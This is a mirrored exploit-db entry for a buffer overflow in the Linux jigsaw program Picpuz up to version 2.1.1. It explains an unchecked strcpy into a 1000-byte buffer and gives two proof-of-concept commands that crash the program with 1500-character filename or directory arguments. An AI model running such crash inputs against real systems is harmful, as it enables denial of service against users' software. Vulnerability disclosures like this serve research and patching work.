bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/dos/10634.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

34 lines
No EOL
1 KiB
Text
Raw Permalink Blame History

# Exploit Title: Picpuz Buffer Overflow DoS/PoC <=2.1.1
# Date: 24 Dec, 2009
# Author: sandman, n4mdn4s [4T] gmail [D0T] com
# Software Link: http://kornelix.squarespace.com/picpuz/<http://kornelix.squarespace.com/printoxx/>, http://kornelix.squarespace.com/storage/downloads/picpuz-2.1.1.tar.gz<http://kornelix.squarespace.com/storage/downloads/printoxx-2.1.2.tar.gz>
# Version: <= 2.1.1
# Tested on: Fedora 12
# CVE: None
# Code:
Description:
"from website"
Picpuz is a free Linux "jigsaw puzzle" program.
You can take almost any image (jpeg, tiff, png ...) and scramble it into many pieces (tens to hundreds). You can
then reassemble the picture using the mouse to move the pieces around.
Vulnerability:
Picpuz does not check the length of input filename/directory thus overwriting the buffer [1000 in size] with a call to strcpy.
Proof Of Concept:
Image filename overflow:
$ ./picpuz -f $(python -c 'print "A"*1500')
Directory filename overflow:
$ ./picpuz -i $(python -c 'print "A"*1500')
Severity: Very Low
#$
Reference in a new issue View git blame Copy permalink